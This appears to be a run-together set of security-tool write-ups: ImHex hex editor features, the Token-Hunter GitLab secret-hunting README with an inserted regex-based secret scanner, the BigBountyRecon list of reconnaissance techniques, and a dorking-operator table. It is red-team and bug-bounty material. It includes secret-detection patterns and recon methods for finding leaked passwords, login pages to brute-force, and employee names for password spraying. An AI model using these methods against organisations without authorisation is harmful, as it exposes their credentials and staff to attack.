  • Custom C++-like pattern language for parsing and highlighting a file's content
    • Automatic loading based on MIME type
    • arrays, pointers, structs, unions, enums, bitfields, using declarations, little and big endian support, conditionals and much more!
    • Useful error messages, syntax highlighting and error marking
  • Data importing
    • Base64 files
    • IPS and IPS32 patches
  • Data exporting
    • IPS and IPS32 patches
  • Data inspector allowing interpretation of data as many different types (little and big endian)
  • Huge file support with fast and efficient loading
  • String search
    • Copying of strings
    • Copying of demangled strings
  • File hashing support
    • CRC16 and CRC32 with custom initial values and polynomials
    • MD4, MD5
    • SHA-1, SHA-224, SHA-256, SHA-384, SHA-512
  • Disassembler supporting many different architectures
    • ARM32 (ARM, Thumb, Cortex-M, AArch32)
    • ARM64
    • MIPS (MIPS32, MIPS64, MIPS32R6, Micro)
    • x86 (16-bit, 32-bit, 64-bit)
    • PowerPC (32-bit, 64-bit)
    • SPARC
    • IBM SystemZ
    • xCORE
    • M68K
    • TMS320C64X
    • M680X
    • Ethereum
  • Bookmarks
    • Region highlighting
    • Comments
  • Data Analyzer
    • File magic-based file parser and MIME type database
    • Byte distribution graph
    • Entropy graph
    • Highest and average entropy
    • Encrypted / Compressed file detection
  • Helpful tools
    • Itanium and MSVC demangler
    • ASCII table
    • Regex replacer
    • Mathematical expression evaluator (Calculator)
    • Hexadecimal Color picker
  • Built-in cheat sheet for pattern language and Math evaluator
  • Doesn't burn out your retinas when used in late-night sessions

Screenshots




Pattern Language

The custom C-like Pattern Language developed and used by ImHex is easy to read, understand and learn. A guide with all features of the language can be found in the wiki, or a simpler version in ImHex under Help -> Pattern Language Cheat Sheet


Additional Files

For format patterns, includable libraries and magic files, check out the ImHex-Patterns repository. Feel free to PR your own files there as well!


Nightly builds

See latest nightly builds on the artifacts result of the Build action here.

NOTE: We currently only provide nightly builds for macOS (x86_64)


Compiling

You need a C++20 compatible compiler such as GCC 10.2.0 to compile ImHex. Moreover, the following dependencies are needed for compiling ImHex:

  • GLFW3
  • libmagic, libgnurx, libtre, libintl, libiconv
  • libcrypto
  • capstone
  • nlohmann json
  • Python3
  • freetype2
  • Brew (macOS only)

Windows and Linux

Find all-in-one dependency installation scripts for Arch Linux, Fedora, Debian/Ubuntu and/or MSYS2 in dist.

After all the dependencies are installed, run the following commands to build ImHex:

mkdir build
cd build
cmake -DCMAKE_BUILD_TYPE=Release ..
make -j


To create a standalone zipfile on Windows, get the Python standard library (e.g. from https://github.com/python/cpython/tree/master/Lib) and place the files and folders in lib/python3.8 next to your built executable. Don't forget to also copy the libpython3.8.dll and libwinpthread-1.dll from your mingw setup next to the executable.

On both Windows and Linux:

  • Copy the files from python_libs in the lib folder next to your built executable.
  • Place your magic databases in the magic folder next to your built executable
  • Place your patterns in the pattern folder next to your built executable
  • Place your include pattern files in the include folder next to your built executable

macOS

To build ImHex on macOS, run the following commands:

brew bundle --no-lock --file dist/Brewfile
mkdir build
cd build
CC=$(brew --prefix llvm)/bin/clang CXX=$(brew --prefix llvm)/bin/clang++ PKG_CONFIG_PATH="$(brew --prefix openssl)/lib/pkgconfig":"$(brew --prefix)/lib/pkgconfig" cmake -DCMAKE_BUILD_TYPE=Release ..
make -j

Credits
  • Thanks a lot to ocornut for their amazing Dear ImGui which is used for building the entire interface
    • Thanks to ocornut as well for their hex editor view used as base for this project.
    • Thanks to BalazsJako for their incredible ImGuiColorTextEdit used for the pattern language syntax highlighting
    • Thanks to AirGuanZ for their amazing imgui-filebrowser used for loading and saving files
  • Thanks to nlohmann for their json library used for project files
  • Thanks to aquynh for capstone which is the base of the disassembly window


Token-Hunter - Collect OSINT For GitLab Groups And Members And Search The Group And Group Members' Snippets, Issues, And Issue Discussions For Sensitive Data That May Be Included In These Assets



Collect OSINT for GitLab groups and members and search the group and group members' snippets, issues, and issue discussions for sensitive data that may be included in these assets. The information gathered is intended to complement and inform the use of additional tools such as TruffleHog or GitRob, which search git commit history using a similar technique of regular expression matching.


How the tool works

Start by providing a group ID for a specific group on GitLab. You can find the group ID underneath the group name in the GitLab UI. Token-Hunter will use the GitLab group ID to find all associated projects for that group and, optionally, the group members' personal projects. Configure the tool to look for sensitive data in assets related to the projects it finds. Token-Hunter uses the same set of regular expressions as TruffleHog with a few additions for GitLab-specific tokens. Token-Hunter depends on these easily configurable regular expressions for accuracy and effectiveness. Currently, the tool supports GitLab snippets, issues, and issue discussions with plans for future expansion to other assets. The tool is intended to be very configurable to allow for efficient discovery of sensitive data in the assets you're specifically interested in.
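The regular-expression matching described above, as an added example that is not Token-Hunter's own code: a small scanner that runs a rule set over the text of snippets, issues and comments, reports the rule, line number and a redacted match, and never echoes the full secret into its own output. The rules and the asset bodies are constructed for illustration; Token-Hunter ships its own regex set.

```python
import re
from typing import Dict, List, NamedTuple


class Finding(NamedTuple):
    rule: str
    line_no: int
    match: str  # redacted, see redact()


# Constructed rules for illustration (the AWS pattern is the well-known TruffleHog one;
# the GitLab one matches the glpat- prefixed personal access token format).
RULES = {
    "aws_access_key_id": re.compile(r"\bAKIA[0-9A-Z]{16}\b"),
    "gitlab_pat": re.compile(r"\bglpat-[0-9A-Za-z_-]{20}\b"),
    "private_key_block": re.compile(r"-----BEGIN (?:RSA |EC |OPENSSH )?PRIVATE KEY-----"),
}


def redact(secret: str, keep: int = 4) -> str:
    """Keep only a short prefix so the report itself does not re-leak the value."""
    return secret[:keep] + "*" * (len(secret) - keep)


def scan_text(text: str, rules=RULES) -> List[Finding]:
    """Run every rule over every line and return redacted findings in line order."""
    findings: List[Finding] = []
    for line_no, line in enumerate(text.splitlines(), start=1):
        for name, pattern in rules.items():
            for m in pattern.finditer(line):
                findings.append(Finding(name, line_no, redact(m.group(0))))
    return findings


def scan_assets(assets: Dict[str, str]) -> Dict[str, List[Finding]]:
    """Scan a mapping of asset label (project/snippet, issue, note) to body text.

    Only assets with at least one finding appear in the result.
    """
    report: Dict[str, List[Finding]] = {}
    for label, body in assets.items():
        hits = scan_text(body)
        if hits:
            report[label] = hits
    return report


# Constructed sample assets; the AWS value is the documented example key, not a live one.
SAMPLE_ASSETS = {
    "example-group/app/snippets/1": "export AWS_ACCESS_KEY_ID=AKIAIOSFODNN7EXAMPLE\necho done\n",
    "example-group/app/issues/7#note_3": "CI fails, runner uses glpat-abcdefghijklmnopqrst for now\n",
    "example-group/app/issues/8": "nothing sensitive here\n",
}

if __name__ == "__main__":
    for label, hits in scan_assets(SAMPLE_ASSETS).items():
        for hit in hits:
            print(f"{label}:{hit.line_no} {hit.rule} {hit.match}")
```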


Usage

Before running the tool, you will need to generate a GitLab Personal Access Token (PAT) and export it as an environment variable. This can be done as shown below (please select api in the scopes section):

export GITLAB_API_TOKEN=xxxxx

Next, clone the repository and install dependencies with:

git clone https://gitlab.com/gitlab-com/gl-security/gl-redteam/token-hunter.git
pip3 install -r ./requirements.txt

Then, you can run the tool and specify your options as follows:

usage: token-hunter.py [-h] -g GROUP [-u URL] [-m] [-s] [-i] [-r] [-t]
[-p PROXY] [-c CERT] [-l LOGFILE]

Collect OSINT for GitLab groups and members. Optionally search the group and
group members snippets, project issues, and issue discussions/comments for
sensitive data.

optional arguments:
-h, --help show this help message and exit
-u URL, --url URL An optional argument to specify the base URL of your
GitLab instance. If the argument is not supplied, its
defaulted to 'https://gitlab.com'
-m, --members Include group members personal projects and their
related assets in the searchfor sensitive data.
-s, --snippets Searches found projects for GitLab Snippets with
sensitive data.
-i, --issues Searches found projects for GitLab Issues and
discussions/comments with sensitive data.
-r, --mergerequests Searches found projects for GitLab Merge Requests and
discussions/comments with sensitive data.
-t, --timestamp Disables display of start/finish times and originating
IP to the output
-p PROXY, --proxy PROXY
Proxies all requests using the provided URI matching
the scheme: http(s)://user:pass@10.10.10.10:8000
-c CERT, --cert CERT Used in tandem with -p (--proxy), this switch provides
a fully qualified path to a certificate to verify TLS
connections. Provide a fully qualified path to the
dynamic cert. Example:
/Users/<username>/owasp_zap_root_ca.cer.
-l LOGFILE, --logfile LOGFILE
Will APPEND all output to specified file.

required arguments:
-g GROUP, --group GROUP
ID or HTML encoded name of a GitLab group. This
option, by itself, will display group projects and
member names only.

Usage Examples

./token-hunter.py -g 123456

The simplest use case is to return all the project URLs associated with a group by providing the group ID with the -g switch. You can find the group ID underneath the group name in the GitLab UI. No token searches are performed with this configuration.

./token-hunter.py -g 123456 -m

Finds all projects for group 123456 as well as all of the personal projects for the group members. No token searches are performed with this configuration.

./token-hunter.py -g 123456 -ms

Finds all projects for group 123456 as well as all of the personal projects for the group members. The -s switch tells Token-Hunter to search GitLab snippets associated with each found project for sensitive data.

./token-hunter.py -g 123456 -msir

Finds all projects for group 123456 as well as all of the personal projects for the group members. The -s switch tells Token-Hunter to search GitLab snippets associated with each found project for sensitive data. The -i switch tells Token-Hunter to also search issues and discussions for each of the found projects for sensitive data. The -r switch tells Token-Hunter to also search merge requests and merge request discussions for each of the found projects. CAUTION: This configuration has the potential to pull a lot of data!

./token-hunter.py -g 123456 -msit -u https://mygitlab-instance.com -p http://127.0.01:8080 -c /Users/hacker/owasp_zap_ca_cert.cer -l ./appended-output.txt

Performs the same asset searches as the previous example against a self-hosted installation of GitLab running at https://mygitlab-instance.com. Requests and responses that the tool generates are proxied through http://127.0.01:8080 using the certificate defined at the fully qualified path /Users/hacker/owasp_zap_ca_cert.cer to decrypt the TLS traffic. Timestamps and origin IP are excluded from the output with the -t switch. Output is APPENDED to the ./appended-output.txt file with the -l switch.


Contributing

Contributions are welcome from the community. You can find and add to the issue list, submit merge requests, and add to the existing discussions. Token-Hunter is written in Python 3. To make a code contribution:

  1. Install python version 3
  2. Install pip version 3 to manage dependencies using the guide above.
  3. Clone the repository
  4. In the root directory, install dependencies with pip3 install -r ./requirements.txt
  5. Create a branch for the changes you'd like to make.
  6. Modify or add test coverage in the existing ./test_* files, adding new files as needed.
  7. Execute tests, written in pytest, with pytest -v to make sure they pass.
  8. Create a merge request for your changes and tag @gitlab-red-team to review and merge it.
  9. Repeat!


BigBountyRecon - This Tool Utilises 58 Different Techniques To Expedite The Process Of Initial Reconnaissance On The Target Organisation



BigBountyRecon tool utilises 58 different techniques using various Google dorks and open source tools to expedite the process of initial reconnaissance on the target organisation. Reconnaissance is the most important step in any penetration testing or a bug hunting process. It provides an attacker with some preliminary knowledge on the target organisation. Furthermore, it will be useful to gain insights into what controls are in place as well as some rough estimations on the security maturity level of the target organisation.

This tool can be used in addition to your usual approach for bug hunting. The idea is to quickly check and gather information about your target organisation without investing time and remembering these syntaxes. In addition, it can help you define an approach towards finding some quick wins on the target.

Any suggestions or ideas for this tool are welcome - just tweet me on @ManiarViral


Techniques
  1. Directory Listing: Finding open directories using Google Dork on your target organisation helps one to understand the directory structure on the webserver. It may reveal sensitive information or it may lead to information disclosure.

  2. Configuration Files: Configuration files often contain sensitive information such as hardcoded passwords, sensitive drive locations or API tokens which can help you gain privileged access to internal resources.

  3. Database Files: Database Files are data files that are used to store the contents of the database in a structured format into a file in separate tables and fields. Depending on the nature of the web application these files could provide access to sensitive information.

  4. WordPress: WordPress is an open-source CMS written in PHP. WordPress has thousands of plugins to build, customise and enhance the websites. There are numerous vulnerabilities in these plugins. Finding WordPress related

  5. Log Files: Log files sometimes provide detailed information of the users' activities in a particular application. These files are good to look at session cookies or other types of tokens.

  6. Backup and Old Files: Backup files are original copies of the critical systems. These provide access to PII or access to sensitive records.

  7. Login Pages: It is extremely important to identify login pages of your target organisation to perform bruteforce attempts or trying default credentials to gain further access to organisation resources.

  8. SQL Errors: SQL errors leak sensitive information about the backend systems. This can help one to enumerate the database type and see if the application is vulnerable to input validation related attacks such as SQL Injection.

  9. Apache Config Files: Apache HTTP Server is configured by placing directives in plain text configuration files. The main configuration file is usually called httpd.conf. In addition, other configuration files may be added using the Include directive, and wildcards can be used to include many configuration files. Any directive may be placed in any of these configuration files. Depending on the entries in these config files it may reveal database connection strings, username and passwords, the internal workings, used and referenced libraries and business logic of application.

  10. Robots.txt File: Robots.txt file instructs web robots how to crawl pages on their website. Depending on the content of the file, an attacker might discover hidden directories and files.

  11. DomainEye: DomainEye is a domain/host investigation tool that has the largest domain databases. They provide services such as reverse Whois, reverse IP lookup, as well as reverse NS and MX.

  12. Publicly Exposed Documents: Such documents can be used to extract metadata information.

  13. phpinfo(): Exposing phpinfo() on its own isn't necessarily a risk, but in combination with other vulnerabilities it could lead to your site becoming compromised. Additionally, exposed module versions make an attacker's life easier when targeting the application with newly discovered exploits.

  14. Finding Backdoors: This can help one to identify website defacements or server hijacking related issues. By exploiting the open redirect vulnerability on the trusted web application, the attacker can redirect victims to a phishing page.

  15. Install/Setup Files: Such files allow an attacker to perform enumeration on the target organisation. Information gathered from these files can reveal version details, which can then be used to select a targeted exploit.

  16. Open Redirects: With these, we look at various known parameters vulnerable to open redirect related issues.

  17. Apache Struts RCE: Successfully exploiting an RCE vulnerability could allow the attacker to run arbitrary programs. Here, we are looking for files with extensions of ".action" or ".do".

  18. 3rd Party Exposure: Here we are looking for exposure of information on third party sites such as Codebeautify, Codeshare and Codepen.

  19. Check Security Headers: Identify quickly if the target site is using security related headers in the server response.

  20. GitLab: Quickly look for sensitive information on the GitLab.

  21. Find Pastebin Entries: Shows you the results related to the target organisation on the Pastebin site. This could be passwords or any other sensitive information related to the target organisation.

  22. Employees on LINKEDIN: Identifying employee names on LinkedIn can help you build a username list when it comes to password spraying attack.

  23. .HTACCESS / Sensitive Files: Look for sensitive file exposure. This may indicate a server misconfiguration.

  24. Find Subdomains: Subdomain helps you expand the attack surface on the target organisation. There are numerous tools available to automate the process of subdomain enumeration.

  25. Find Sub-Subdomains: Identify sub-subdomains on the target organisation using Google Dorks.

  26. Find WordPress related exposure: WordPress related exposure helps you gain access to sensitive files and folders.

  27. BitBucket & Atlassian: Source code leakage, hardcoded credentials and access to cloud infrastructure.

  28. PassiveTotal: PassiveTotal is a great tool to perform threat investigation. BigBountyRecon uses PassiveTotal to identify subdomains of the target organisation.

  29. Stackoverflow: Source code exposure or any technology-specific questions mentioned on the Stackoverflow.

  30. Find WordPress related exposure using Wayback Machine: Look for archived WordPress files using the Wayback Machine.

  31. GitHub: Quickly look for sensitive information on the GitHub.

  32. OpenBugBounty: Look for publicly exposed security issues on the OpenBugBounty website.

  33. Reddit: Information about the particular organisation on the Reddit platform.

  34. Crossdomain.xml: Look for misconfigured crossdomain.xml files on the target organisation.

  35. ThreatCrowd: Search engine for threats, however, we are going to use this to identify additional sub-domains.

  36. .git Folder: Source code exposure. It's possible to download the entire repository content if the folder is accessible.

  37. YouTube: Look for any recent news on Youtube.

  38. Digitalocean Spaces: Spaces is an S3-compatible object storage service that lets you store and serve large amounts of data. We will look for any data exposures.

  39. .SWF File (Google): Flash is dead. We are going to use Google Dorks to look for older versions of flash .swf's which contain vulnerabilities.

  40. .SWF File (Yandex): Flash is dead. We are going to use Yandex to look for older versions of flash .swf's which contain vulnerabilities.

  41. .SWF File (Wayback Machine): Flash is dead. We are going to use WaybackMachine to look for older versions of flash .swf's which contain vulnerabilities.

  42. Wayback Machine: Look for archived files to access old files.

  43. Reverse IP Lookup: Reverse IP Lookup lets you discover all the domain names hosted on any given IP address. This will help you to explore the attack surface for a target organisation.

  44. Traefik: Traefik is an open-source edge router. Look for an unauthenticated Traefik interface which exposes internal services.

  45. Cloud Storage and Buckets: Google CSE for various cloud storages - aws, digitalocean, backblaze, wasabi, rackspace, dropbox, ibm, azure, dreamhost, linode, gcp, box, mailru

  46. s3 Buckets: Open s3 buckets.

  47. PublicWWW: Source code search engine indexes the content of over 200 million web sites and provides a query interface that lets the caller find any alphanumeric snippet, signature or keyword in the web pages ‘HTML’, ‘JavaScript’ and ‘CSS’ style sheet code.

  48. Censys (IPv4, Domains & Certs): Search engine for finding internet devices. We will use this to look for additional sub-domains using various endpoints on Censys.

  49. Shodan: Search engine for Internet-connected devices

  50. SharePoint RCE: Look for CVE-2020-0646 SharePoint RCE related endpoint.

  51. API Endpoints: Find WSDL files.

  52. Gist Searches: Quickly look for sensitive information on the Gist pastes.

  53. CT Logs: Certificate Transparency (CT) is an Internet security standard and open-source framework for monitoring and auditing digital certificates. We will use it to look for additional sub-domains of a targeted organisation.

  54. Password Leak: Look for plaintext passwords of internal employees exposed in various leaks.

  55. What CMS: Identify the version and type of CMS used by a target organisation for targeted enumeration and exploit research.


Screenshots

Search for plaintext passwords for a target organisation:



Looking for subdomains and other interesting information on the target organisation:



Finding Apache Struts related assets:



Verifying if the URL contains the extension ".do":



How to use this tool?

Step 1: Download the file from the Release section: https://github.com/Viralmaniar/BigBountyRecon/releases/download/v0.1/BigBountyRecon.exe

Step 2: Run the EXE file

Step 3: Enter the target domain

Step 4: Click on different buttons in the tool to find information

Step 5: In case of a Google Captcha, simply click on the puzzle and move ahead


Questions?

Twitter: https://twitter.com/maniarviral
LinkedIn: https://au.linkedin.com/in/viralmaniar


Dorking operators across Google, DuckDuckGo, Yahoo and Bing

Table obtained from: https://exposingtheinvisible.org/guides/google-dorking/

Here is a table with possible dorks for various search engines.

Dork | Description
cache:[url] | Shows the version of the web page from the search engine's cache.
related:[url] | Finds web pages that are similar to the specified web page.
info:[url] | Presents some information that Google has about a web page, including similar pages, the cached version of the page, and sites linking to the page.
site:[url] | Finds pages only within a particular domain and all its subdomains.
intitle:[text] or allintitle:[text] | Finds pages that include a specific keyword as part of the indexed title tag. You must include a space between the colon and the query for the operator to work in Bing.
allinurl:[text] | Finds pages that include a specific keyword as part of their indexed URLs.
meta:[text] | Finds pages that contain the specific keyword in the meta tags.
filetype:[file extension] | Searches for specific file types.
intext:[text], allintext:[text], inbody:[text] | Searches the text of the page. For Bing and Yahoo the query is inbody:[text]. For DuckDuckGo the query is intext:[text]. For Google either intext:[text] or allintext:[text] can be used.
inanchor:[text] | Searches link anchor text.
location:[iso code] or loc:[iso code], region:[region code] | Searches for a specific region. For Bing use location:[iso code] or loc:[iso code] and for DuckDuckGo use region:[iso code]. An ISO location code is a short code for a country; for example, Egypt is eg and the USA is us. https://en.wikipedia.org/wiki/ISO_3166-1
contains:[text] | Identifies sites that contain links to the file types specified (i.e. contains:pdf).
altloc:[iso code] | Searches for a location in addition to the one specified by the language of the site (i.e. pt-us or en-us).
feed:[feed type, i.e. rss] | Finds RSS feeds related to the search term.
hasfeed:[url] | Finds web pages that contain both the term or terms for which you are querying and one or more RSS or Atom feeds.
ip:[ip address] | Finds sites hosted by a specific IP address.
language:[language code] | Returns websites that match the search term in a specified language.
book:[title] | Searches for book titles related to keywords.
maps:[location] | Searches for maps related to keywords.
linkfromdomain:[url] | Shows websites whose links are mentioned in the specified URL (with errors).

Contribution

Any suggestions or ideas for this tool are welcome - just tweet me on @ManiarViral


